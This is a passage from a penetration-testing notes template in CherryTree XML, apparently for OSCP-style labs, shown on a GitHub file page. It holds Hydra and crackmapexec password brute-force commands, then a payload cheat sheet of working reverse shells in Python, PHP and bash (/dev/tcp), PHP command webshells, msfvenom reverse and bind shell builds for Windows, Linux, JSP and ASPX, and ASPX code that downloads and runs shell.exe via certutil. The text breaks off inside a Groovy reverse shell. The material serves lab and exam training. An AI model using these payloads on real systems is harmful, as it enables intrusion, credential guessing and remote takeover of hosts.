-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCTF_template.ctd
More file actions
4253 lines (3381 loc) · 402 KB
/
CTF_template.ctd
File metadata and controls
4253 lines (3381 loc) · 402 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<?xml version="1.0" encoding="UTF-8"?>
<cherrytree>
<bookmarks list=""/>
<node name="10.11.1." unique_id="2" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="10" is_bold="1" foreground="" ts_creation="0" ts_lastsave="1675519371">
<rich_text>IP :10.11.1.
Hostname:
OS:
Linux Proof: </rich_text>
<rich_text family="monospace">cat proof.txt && hostname && id && whoami && /sbin/ifconfig</rich_text>
<rich_text>
Windows Proof: </rich_text>
<rich_text family="monospace">hostname && whoami.exe && whoami.exe /groups && type proof.txt && ipconfig /all</rich_text>
<rich_text>
</rich_text>
<node name="Log Book" unique_id="1" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="1" nosearch_ch="0" custom_icon_id="20" is_bold="1" foreground="" ts_creation="0" ts_lastsave="1676120787"/>
<node name="Exploitation" unique_id="22" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="1" nosearch_ch="0" custom_icon_id="22" is_bold="0" foreground="" ts_creation="0" ts_lastsave="1500474629">
<rich_text weight="heavy">Service Exploited:
Vulnerability Type:
Exploit POC:</rich_text>
<rich_text>
</rich_text>
<rich_text weight="heavy">Description</rich_text>
<rich_text>:
</rich_text>
<rich_text underline="single" weight="heavy">Discovery of Vulnerability</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single" weight="heavy">Exploit Code Used</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single" weight="heavy">Proof\Local.txt File</rich_text>
<rich_text>
☐ Screenshot with ifconfig\ipconfig
☐ Submit too OSCP Exam Panel
</rich_text>
</node>
<node name="Priv Escalation" unique_id="12" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="1" nosearch_ch="0" custom_icon_id="10" is_bold="0" foreground="" ts_creation="0" ts_lastsave="1500474606">
<rich_text weight="heavy">Service Exploited:
Vulnerability Type:
Exploit POC:</rich_text>
<rich_text>
</rich_text>
<rich_text weight="heavy">Description</rich_text>
<rich_text>:
</rich_text>
<rich_text underline="single" weight="heavy">Discovery of Vulnerability</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single" weight="heavy">Exploit Code Used</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single" weight="heavy">Proof\Local.txt File</rich_text>
<rich_text>
☐ Screenshot with ifconfig\ipconfig
☐ Submit too OSCP Exam Panel
</rich_text>
</node>
<node name="Goodies" unique_id="3" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="1" nosearch_ch="0" custom_icon_id="43" is_bold="0" foreground="" ts_creation="0" ts_lastsave="1684267948">
<node name="Hashes" unique_id="9" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="1" nosearch_ch="1" custom_icon_id="18" is_bold="0" foreground="" ts_creation="0" ts_lastsave="1492949998"/>
<node name="Passwords" unique_id="5" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="1" custom_icon_id="18" is_bold="0" foreground="" ts_creation="0" ts_lastsave="1492950150"/>
<node name="Proof\Flags\Other" unique_id="6" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="1" custom_icon_id="18" is_bold="0" foreground="" ts_creation="0" ts_lastsave="1711230183">
<rich_text>
Linux Proof: </rich_text>
<rich_text family="monospace">cat proof.txt && hostname && id && whoami && /sbin/ifconfig</rich_text>
<rich_text>
Windows Proof:
</rich_text>
<rich_text family="monospace">hostname && whoami.exe && whoami.exe /groups && type proof.txt && ipconfig /all</rich_text>
<rich_text>
or
</rich_text>
<rich_text justification="left"></rich_text>
<codebox char_offset="177" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">hostname; whoami.exe; whoami.exe /groups; type root.txt ; ipconfig /all</codebox>
</node>
</node>
<node name="Methodology" unique_id="29" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1684267948" ts_lastsave="1712267115">
<rich_text>
☐ </rich_text>
<rich_text link="node 36">nmap</rich_text>
<rich_text>
☐ </rich_text>
<rich_text link="node 103">DNS</rich_text>
<rich_text>
☐ </rich_text>
<rich_text link="node 31">gobuster</rich_text>
<rich_text>
☐ </rich_text>
<rich_text link="node 33">nikto</rich_text>
<rich_text>
☐ </rich_text>
<rich_text link="node 37">FTP</rich_text>
<rich_text>
☐ </rich_text>
<rich_text link="node 34">smb</rich_text>
<rich_text>
☐ </rich_text>
<rich_text link="node 35">Active Directory</rich_text>
<rich_text>
☐ </rich_text>
<rich_text link="node 32">ssh</rich_text>
<rich_text>
☐ </rich_text>
<rich_text link="node 42">PrivEsc</rich_text>
<rich_text>
☐ </rich_text>
<rich_text link="node 106">SNMP</rich_text>
<node name="Brute Force" unique_id="57" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690629" ts_lastsave="1687690684">
<rich_text> </rich_text>
<node name="Hydra" unique_id="58" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690629" ts_lastsave="1712270093">
<rich_text underline="single" scale="h1">Hydra</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single" scale="h2">HTTP Basic Authentication</rich_text>
<rich_text>
</rich_text>
<rich_text justification="left"></rich_text>
<rich_text>
</rich_text>
<rich_text underline="single" scale="h2">HTTP Get Request</rich_text>
<rich_text>
</rich_text>
<rich_text justification="left"></rich_text>
<rich_text>
</rich_text>
<rich_text underline="single" scale="h2">HTTP Post Request</rich_text>
<rich_text>
Check request in BURP to see Post parameters. -l or -L has to be set, even if there is no user to login with!. Use </rich_text>
<rich_text justification="left"></rich_text>
<rich_text> instead of</rich_text>
<rich_text justification="left"></rich_text>
<rich_text> for HTTPS sites.
</rich_text>
<rich_text justification="left"></rich_text>
<rich_text>
or with a port
</rich_text>
<rich_text justification="left"></rich_text>
<rich_text>
</rich_text>
<rich_text underline="single" scale="h2">MYSQL</rich_text>
<rich_text>
Change MYDATABASENAME. Default databasename is mysql.
</rich_text>
<rich_text justification="left"></rich_text>
<rich_text>
SSH
</rich_text>
<rich_text justification="left"></rich_text>
<rich_text>
or if that doesnt work
</rich_text>
<rich_text justification="left"></rich_text>
<codebox char_offset="36" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">hydra -l admin -V -P /usr/share/wordlists/rockyou.txt -s 80 -f 10.11.1. http-get /phpmyadmin/ -t 15</codebox>
<codebox char_offset="56" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">hydra 10.11.1. -V -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt http-get-form "/login/:username=^USER^&password=^PASS^:F=Error:H=Cookie: safe=yes; PHPSESSID=12345myphpsessid" -t 15</codebox>
<codebox char_offset="192" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">https-post-form</codebox>
<codebox char_offset="204" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0"> http-post-forms</codebox>
<codebox char_offset="224" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1. http-post-form "/webapp/login.php:username=^USER^&password=^PASS^:Invalid" -t 15</codebox>
<codebox char_offset="245" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1. -s 8080 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid" -t 15</codebox>
<codebox char_offset="313" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -vv mysql://10.11.1.:3306/MYDATABASENAME -t 15</codebox>
<codebox char_offset="323" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">hydra -l kali -P /usr/share/wordlists/rockyou.txt ssh://10.11.1.</codebox>
<codebox char_offset="350" justification="left" frame_width="28" frame_height="8" width_in_pixels="0" syntax_highlighting="sh" highlight_brackets="1" show_line_numbers="0">crackmapexec ssh 10.11.1. -u patrick -p /usr/share/wordlists/rockyou.txt
</codebox>
</node>
</node>
<node name="Shells" unique_id="59" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1701626719">
<rich_text>
☐ </rich_text>
<rich_text link="webs https://www.revshells.com/">https://www.revshells.com/</rich_text>
<rich_text>
☐ moz-extension://c8e8314e-8d2e-4f3a-9b40-37d10c56988b/index.html </rich_text>
<node name="Catching Reverse Shells (Nc)" unique_id="62" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<rich_text underline="single" scale="h1">Catching Reverse Shells (Netcat)</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
rlwrap enables the usage of arrow keys in your shell. </rich_text>
<rich_text link="webs https://github.com/hanslub42/rlwrap">https://github.com/hanslub42/rlwrap</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">rlwrap nc -nlvp 4444</rich_text>
</node>
<node name="Python" unique_id="67" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<rich_text underline="single" scale="h1">Python</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">Reverse Shell</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single">As Command:</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single">Python Code:</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace" foreground="#d73a49">import</rich_text>
<rich_text family="monospace"> socket,subprocess,os
s</rich_text>
<rich_text family="monospace" foreground="#005cc5">=</rich_text>
<rich_text family="monospace">socket.</rich_text>
<rich_text family="monospace" foreground="#6f42c1">socket</rich_text>
<rich_text family="monospace">(socket.</rich_text>
<rich_text family="monospace" foreground="#e36209">AF_INET</rich_text>
<rich_text family="monospace">,socket.</rich_text>
<rich_text family="monospace" foreground="#e36209">SOCK_STREAM</rich_text>
<rich_text family="monospace">)
s.</rich_text>
<rich_text family="monospace" foreground="#6f42c1">connect</rich_text>
<rich_text family="monospace">(("192.168.0.1",</rich_text>
<rich_text family="monospace" foreground="#005cc5">4444</rich_text>
<rich_text family="monospace">));os.</rich_text>
<rich_text family="monospace" foreground="#6f42c1">dup2</rich_text>
<rich_text family="monospace">(s.</rich_text>
<rich_text family="monospace" foreground="#6f42c1">fileno</rich_text>
<rich_text family="monospace">(),</rich_text>
<rich_text family="monospace" foreground="#005cc5">0</rich_text>
<rich_text family="monospace">)
os.</rich_text>
<rich_text family="monospace" foreground="#6f42c1">dup2</rich_text>
<rich_text family="monospace">(s.</rich_text>
<rich_text family="monospace" foreground="#6f42c1">fileno</rich_text>
<rich_text family="monospace">(),</rich_text>
<rich_text family="monospace" foreground="#005cc5">1</rich_text>
<rich_text family="monospace">)
os.</rich_text>
<rich_text family="monospace" foreground="#6f42c1">dup2</rich_text>
<rich_text family="monospace">(s.</rich_text>
<rich_text family="monospace" foreground="#6f42c1">fileno</rich_text>
<rich_text family="monospace">(),</rich_text>
<rich_text family="monospace" foreground="#005cc5">2</rich_text>
<rich_text family="monospace">)
p</rich_text>
<rich_text family="monospace" foreground="#005cc5">=</rich_text>
<rich_text family="monospace">subprocess.</rich_text>
<rich_text family="monospace" foreground="#6f42c1">call</rich_text>
<rich_text family="monospace">(["/bin/sh","-i"])</rich_text>
</node>
<node name="PHP" unique_id="68" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<rich_text>PHP</rich_text>
<node name="Kali Default PHP Reverse Shell" unique_id="69" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<rich_text underline="single" scale="h1">Kali Default PHP Reverse Shell</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text family="monospace">cat /usr/share/webshells/php/php-reverse-shell.php</rich_text>
</node>
<node name="Kali Default PHP CMD Shell" unique_id="70" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<rich_text underline="single" scale="h1">Kali Default PHP CMD Shell</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text family="monospace">cat /usr/share/webshells/php/php-backdoor.php</rich_text>
</node>
<node name="CMD Shell" unique_id="71" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<rich_text underline="single" scale="h1">CMD Shell</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text family="monospace" foreground="#d73a49"><?</rich_text>
<rich_text family="monospace">php </rich_text>
<rich_text family="monospace" foreground="#005cc5">echo</rich_text>
<rich_text family="monospace"> system($_REQUEST["cmd"])</rich_text>
<rich_text family="monospace" foreground="#d73a49">;</rich_text>
<rich_text family="monospace"> </rich_text>
<rich_text family="monospace" foreground="#d73a49">?></rich_text>
<rich_text>
</rich_text>
<rich_text underline="single">Call the CMD shell:</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">http://192.168.0.1/cmd_shell.php</rich_text>
<rich_text family="monospace" foreground="#d73a49">?</rich_text>
<rich_text family="monospace">cmd=whoami</rich_text>
</node>
<node name="White WinterWolf Webshell" unique_id="72" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<rich_text underline="single" scale="h1">WhiteWinterWolf Webshell</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text link="webs https://github.com/WhiteWinterWolf/wwwolf-php-webshell">https://github.com/WhiteWinterWolf/wwwolf-php-webshell</rich_text>
<rich_text>
</rich_text>
</node>
<node name="PHP Reverse Shell" unique_id="73" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<rich_text underline="single" scale="h1">PHP Reverse Shell</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">Version 1</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace" foreground="#d73a49"><?</rich_text>
<rich_text family="monospace">php </rich_text>
<rich_text family="monospace" foreground="#005cc5">echo</rich_text>
<rich_text family="monospace"> shell_exec("/bin/bash -i >& /dev/tcp/192.168.0.1/4444 0>&1")</rich_text>
<rich_text family="monospace" foreground="#d73a49">;?></rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">Version 2</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace" foreground="#d73a49"><?</rich_text>
<rich_text family="monospace">php $sock=fsockopen("192.168.0.1", 4444)</rich_text>
<rich_text family="monospace" foreground="#d73a49">;</rich_text>
<rich_text family="monospace">exec("/bin/sh -i <&3 >&3 2 >& 3")</rich_text>
<rich_text family="monospace" foreground="#d73a49">;?></rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">As Command</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">php -r '$sock=fsockopen("192.168.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'</rich_text>
</node>
</node>
<node name="MSFVENOM" unique_id="74" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<node name="Windows Binary (.exe)" unique_id="75" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<rich_text underline="single" scale="h1">Windows Binary (.exe)</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">32 Bit (x86)</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single">Reverse Shell:</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exe</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single">Bind Shell:</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">msfvenom -p windows/shell_bind_tcp LPORT=4444 -f exe -o bind_shell.exe</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single">Output in Hex, C Style, Exclude bad chars, Exitfunction thread:</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">msfvenom -p windows/shell_bind_tcp LHOST=192.168.0.1 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">64 Bit (x64)</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single">Reverse Shell:</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exe</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single">Bind Shell:</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">msfvenom -p windows/x64/shell_bind_tcp LPORT=4444 -f exe -o bind_shell.exe</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single">Meterpreter:</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o shell.exe</rich_text>
</node>
<node name="Linux Binary (.elf)" unique_id="76" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<rich_text underline="single" scale="h1">Linux Binary (.elf)</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">32 Bit (x86)</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single">Reverse Shell:</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf </rich_text>
<rich_text family="monospace" foreground="#d73a49">></rich_text>
<rich_text family="monospace"> rev_shell.elf</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single">Bind Shell:</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">msfvenom -p linux/x86/shell/bind_tcp LHOST=192.168.0.1 -f elf </rich_text>
<rich_text family="monospace" foreground="#d73a49">></rich_text>
<rich_text family="monospace"> bind_shell.elf</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">64 Bit (x64)</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single">Reverse Shell:</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf </rich_text>
<rich_text family="monospace" foreground="#d73a49">></rich_text>
<rich_text family="monospace"> rev_shell.elf</rich_text>
<rich_text>
</rich_text>
<rich_text underline="single">Bind Shell:</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">msfvenom -p linux/x64/shell/bind_tcp LHOST=192.168.0.1 -f elf </rich_text>
<rich_text family="monospace" foreground="#d73a49">></rich_text>
<rich_text family="monospace"> rev_shell.elf</rich_text>
</node>
<node name="Java Server Pages (.jsp)" unique_id="77" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<rich_text underline="single" scale="h1">Java Server Pages (.jsp)</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">Reverse Shell</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">msfvenom -p java/jsp_shell_reverse_tcp LHOST192.168.0.1 LPORT=4444 -f raw </rich_text>
<rich_text family="monospace" foreground="#d73a49">></rich_text>
<rich_text family="monospace"> shell.jsp</rich_text>
</node>
<node name="Active Sever Pages Extended (.aspx)" unique_id="78" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<rich_text underline="single" scale="h1">Active Sever Pages Extended (aspx)</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">Reverse Shell</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f aspx -o rev_shell.aspx</rich_text>
</node>
</node>
<node name="Active Sever Pages Extended (.apsx)" unique_id="79" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<rich_text scale="h2">Active Sever Pages Extended (.aspx)</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">Transfer A File (Certutil)</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace" foreground="#d73a49"><</rich_text>
<rich_text family="monospace">%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c certutil.exe -urlcache -f http://192.168.0.1/shell.exe C:\Windows\Temp\shell.exe")
o = </rich_text>
<rich_text family="monospace" foreground="#6f42c1">cmd.StdOut.Readall</rich_text>
<rich_text family="monospace">()
Response.write(o)
%</rich_text>
<rich_text family="monospace" foreground="#d73a49">></rich_text>
<rich_text family="monospace">
</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">Execute a File</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace" foreground="#d73a49"><</rich_text>
<rich_text family="monospace">%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c C:\Windows\Temp\shell.exe")
o = </rich_text>
<rich_text family="monospace" foreground="#6f42c1">cmd.StdOut.Readall</rich_text>
<rich_text family="monospace">()
Response.write(o)
%</rich_text>
<rich_text family="monospace" foreground="#d73a49">></rich_text>
<rich_text family="monospace">
</rich_text>
<rich_text>
</rich_text>
</node>
<node name="Jenkins / Groovy (Java)" unique_id="80" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1687690684" ts_lastsave="1687690684">
<rich_text underline="single" scale="h1">Jenkins / Groovy (Java)</rich_text>
<rich_text>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</rich_text>
<rich_text underline="single" scale="h2">Linux Reverse Shell</rich_text>
<rich_text>
</rich_text>
<rich_text family="monospace">String host</rich_text>
<rich_text family="monospace" foreground="#d73a49">=</rich_text>
<rich_text family="monospace">"192.168.0.1";
</rich_text>
<rich_text family="monospace" foreground="#d73a49">int</rich_text>
<rich_text family="monospace"> port</rich_text>
<rich_text family="monospace" foreground="#d73a49">=</rich_text>
<rich_text family="monospace" foreground="#005cc5">4444</rich_text>
<rich_text family="monospace">;
String cmd</rich_text>
<rich_text family="monospace" foreground="#d73a49">=</rich_text>
<rich_text family="monospace">"/bin/sh";
Process p</rich_text>
<rich_text family="monospace" foreground="#d73a49">=new</rich_text>
